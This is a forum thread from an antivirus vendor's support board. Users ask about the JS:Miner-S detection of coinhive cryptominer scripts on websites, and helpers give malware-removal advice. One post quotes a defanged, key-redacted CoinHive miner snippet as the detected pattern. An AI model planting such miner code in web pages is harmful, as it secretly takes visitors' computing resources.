Avast WEBforum

Other => Viruses and worms => Topic started by: TheOwner on April 16, 2018, 05:26:01 PM

Title: JS:Miner-S
Post by: TheOwner on April 16, 2018, 05:26:01 PM
Hello,
Avast block one site and mark it as JS:Miner-S. Athough i know on that site is coinhive miner, i use ublock origin to block it. So why Avast detect it? It is some new version that ublock not block?
Before that it was Miner C now is S, what is difference?
Thank you.
Title: Re: JS:Miner-S
Post by: LukasJ on April 16, 2018, 05:30:31 PM
Hi,
Yes, detection JS:Miner-S blocks new coinhive scripts.

Lukas
Title: Re: JS:Miner-S
Post by: Pondus on April 16, 2018, 05:51:46 PM
Quote
Avast block one site and mark it as JS:Miner-S. Athough i know on that site is coinhive miner, i use ublock origin to block it. So why Avast detect it? It is some new version that ublock not block?
Maybe, or avast webshield read the html code before Ublock


Quote
Before that it was Miner C now is S, what is difference?
Just like cars, there are many variations and all dont come from the same factory   ;)

https://www.fortinet.com/blog/threat-research/the-growing-trend-of-coin-miner-javascript-infection.html


Title: Re: JS:Miner-S
Post by: TheOwner on April 16, 2018, 06:07:07 PM
So i found Avast detect miner when i visit that site and tell me miner was found. Strange is when i look what file was blocked, it not block one javascript, it block url of that page, not file.
Also coinhive script  is blocked by ublock origin, if i disable it, avast detect Miner C.
So i dont uderstand what version S means. It not block any single file. It seems Avast trying block known mining sites, but that site work even avast tried block it.

https://urlquery.net/report/1fef71de-7294-4882-b5d0-5af3dda68faa
Title: Re: JS:Miner-S
Post by: Pondus on April 16, 2018, 06:09:56 PM
they may also add url block .... double protection

what URL is it?  post it none clickable

Title: Re: JS:Miner-S
Post by: Pondus on April 16, 2018, 07:59:15 PM
Sucuri  >>  https://sitecheck.sucuri.net/results/primeassteens.com

Malware entry: malware.cryptominer.3  >>  http://labs.sucuri.net/db/malware/malware.cryptominer.3

HTML_sample scan  >>  https://www.virustotal.com/#/file/7da3ba6dd20d61ccb18bfb9785b5280890db417770401efd596fa0103b556d1a/detection

Title: Re: JS:Miner-S
Post by: TheOwner on April 16, 2018, 08:07:41 PM
Sample.txt? Still dont understant what trigger this popup.
Title: Re: JS:Miner-S
Post by: Pondus on April 16, 2018, 08:12:16 PM
Sample.txt? Still dont understant what trigger this popup.
Website is infected with miner script ... what is strange?

post screenshot of the popup

Title: Re: JS:Miner-S
Post by: TheOwner on April 16, 2018, 08:14:20 PM
I know that!  coinhive.com/lib/coinhive.min.js is Miner C. But where you find S version? In which file?
Title: Re: JS:Miner-S
Post by: Pondus on April 16, 2018, 08:16:24 PM
I know that!  coinhive.com/lib/coinhive.min.js is Miner C. But where you find S version? In which file?
primeassteens.com >> HTML code

Title: Re: JS:Miner-S
Post by: TheOwner on April 16, 2018, 08:24:20 PM
Ok i removed  coinhive.com/lib/coinhive.min.js from that html code, tried virustotal again and now is clean. So it is just two detection of that same file.
Title: Re: JS:Miner-S
Post by: Pondus on April 16, 2018, 08:43:46 PM
The .js file at that location changes, you find many previous versions (different MD5) searching VT

Title: Re: JS:Miner-S
Post by: TheOwner on April 17, 2018, 03:43:07 PM
Yes it is possible, but if i go that site without ublock, avast report 2 detections. One C version that marked js. file and S version which marked html code. But when i block that js file by ublock, avast still report me S version even that miner cannot work without that js.

I found S version trigger this script:
(script)
   var miner = new C o i n H i v e. A n  o n y m o u s('XXXXXXXXXXXXXXXXXXXXXXXXX', {
   // threads: X,
   throttle: X,
});
   miner.start();
(/script)
Title: Re: JS:Miner-S
Post by: TheOwner on April 20, 2018, 07:43:46 PM
Today i no longer see JS:Miner-S detection on that site although that code is still present. I saved html code to .txt file and send to Virustotal and also right clicked that file  -> scan by Avast. Both detect JS:Miner-S but web shield not. When i copied that code here, avast detect too. That means this code is whitelisted on that site?
Title: Re: JS:Miner-S
Post by: jefferson sant on April 23, 2018, 02:01:50 AM
Hello.

Script is contaminated by all links from primeassteens,not only homepage.

https://www.virustotal.com/#/file/b1a6d6d809bb0ed2c98c286cbc8b36fa0366b2a051cbb384e179685415dbea51/detection

Avast detected JS:Miner-S  blocked is all, if this is not for,the address will connect to the server coinhive as authedmine unnoticed by the user and download i.e 2 variants.

worker-asmjs.min.js

https://www.virustotal.com/#/file/ee374ae08f22d91a92cfcf6b9d8b4cccfd0d57016e9d8fd3af9fbdbd36781b38/detection

coinhive.min[1].js

https://www.virustotal.com/#/file/5d514880ad502302dd4bf0ef8da5d38356385d1c43689f6739f6771ed7a4ef73/detection

JS Miner-C contained the known code Cryptojacking that used,it was modified with a new variant in the site of the coinhive, it is detected as BV:Miner-T [Trj] algoritm new CryptoNight.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 13, 2018, 01:43:13 AM
Hello all!

I have this virus for a month or two and it connects on a site when I start firefox. Avast blocks this attempt but he doesn't show where the virus is located, or perhaps it is in firefox. Can somebody help me locate it?

(https://ibb.co/gau3Ud)

https://ibb.co/gau3Ud
Title: Re: JS:Miner-S
Post by: mchain on June 13, 2018, 02:40:44 AM
Miner script is found on this website scanning tool:  http://urlquery.net/report/22b5edd4-362f-4845-b05d-af6c5286fd78 (http://urlquery.net/report/22b5edd4-362f-4845-b05d-af6c5286fd78)

Please follow instructions here:  https://forum.avast.com/index.php?topic=194892.0 (https://forum.avast.com/index.php?topic=194892.0)

Sass Drake will be notified once you post the logs.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 13, 2018, 05:58:36 AM
I removed 51 threats but JS:Miner-S [Trj] is still there.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 13, 2018, 06:13:15 AM
Logs from the Farbar Recovery Scan Tool.
Title: Re: JS:Miner-S
Post by: mchain on June 13, 2018, 07:16:38 AM
Good job.

Sass Drake has been notified.
Title: Re: JS:Miner-S
Post by: Pondus on June 13, 2018, 07:44:12 AM
Hello all!

I have this virus for a month or two and it connects on a site when I start firefox. Avast blocks this attempt but he doesn't show where the virus is located, or perhaps it is in firefox. Can somebody help me locate it?

(https://ibb.co/gau3Ud)

https://ibb.co/gau3Ud
Yes "he" does   

The JS:Miner-S [Trj] is detected on the website (-http://siska.tv/  = a porn site ) and not in your computer, however you have something trying to connect to that URL. Tried to clear your browsers surf history/cache ?

URL Blacklist check
https://www.virustotal.com/#/url/a160501d6ea44e2d7ebba72ccc184c5507f90a3916823132f11e59e3574cf9ec/detection

HTML scan
https://www.virustotal.com/#/file/599d2d25b1dceac8e4a8a385001b59cea6d9d92896f08be04fbb61e1cba21cd0/detection

https://sitecheck.sucuri.net/results/siska.tv



Title: Re: JS:Miner-S
Post by: Sass Drake on June 13, 2018, 04:53:29 PM
Open if Firefox this URL.

Code: [Select]
about:serviceworkers
And remove/unregister everything it lists.

Report status after that.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 13, 2018, 05:49:01 PM
Hello all!

I have this virus for a month or two and it connects on a site when I start firefox. Avast blocks this attempt but he doesn't show where the virus is located, or perhaps it is in firefox. Can somebody help me locate it?

(https://ibb.co/gau3Ud)

https://ibb.co/gau3Ud
Yes "he" does   

The JS:Miner-S [Trj] is detected on the website (-http://siska.tv/  = a porn site ) and not in your computer, however you have something trying to connect to that URL. Tried to clear your browsers surf history/cache ?

URL Blacklist check
https://www.virustotal.com/#/url/a160501d6ea44e2d7ebba72ccc184c5507f90a3916823132f11e59e3574cf9ec/detection

HTML scan
https://www.virustotal.com/#/file/599d2d25b1dceac8e4a8a385001b59cea6d9d92896f08be04fbb61e1cba21cd0/detection

https://sitecheck.sucuri.net/results/siska.tv

Sure, I have done all cleanings and a new installation of firefox but nothing changed.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 13, 2018, 06:02:04 PM
Open if Firefox this URL.

Code: [Select]
about:serviceworkers
And remove/unregister everything it lists.

Report status after that.

I did, still there.
Title: Re: JS:Miner-S
Post by: Sass Drake on June 13, 2018, 10:19:59 PM
Try to refresh Firefox. Go to:
about:support

and click on Refresh Firefox on the right.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 14, 2018, 01:25:38 AM
Try to refresh Firefox. Go to:
about:support

and click on Refresh Firefox on the right.

I found on the right side the option for cleaning up firefox, I used it and no change, the miner is still present.

Also Malwarebytes alarms me about additional connections to diverse sites from malware that it can not find.
Title: Re: JS:Miner-S
Post by: Sass Drake on June 14, 2018, 07:31:10 PM
Lets check if router is one to blame. Set Google DNS on your PC. Instructions -> https://www.windowscentral.com/how-change-your-pcs-dns-settings-windows-10

Restart your PC after this and check if notifications will appear again.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 20, 2018, 04:38:57 AM
Lets check if router is one to blame. Set Google DNS on your PC. Instructions -> https://www.windowscentral.com/how-change-your-pcs-dns-settings-windows-10

Restart your PC after this and check if notifications will appear again.

The problem continues.  :-\
Title: Re: JS:Miner-S
Post by: Sass Drake on June 20, 2018, 04:25:57 PM
Please post new FRST.txt and Addition.txt.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 25, 2018, 09:15:34 AM
Please post new FRST.txt and Addition.txt.


Suddenly avast stopped to alarm about the threat.
Title: Re: JS:Miner-S
Post by: Sass Drake on June 25, 2018, 09:49:57 AM
Rename FRST64 to uninstall and run it. FRST should be unisntalled.
Title: Re: JS:Miner-S
Post by: Explorer97 on June 25, 2018, 04:48:35 PM
...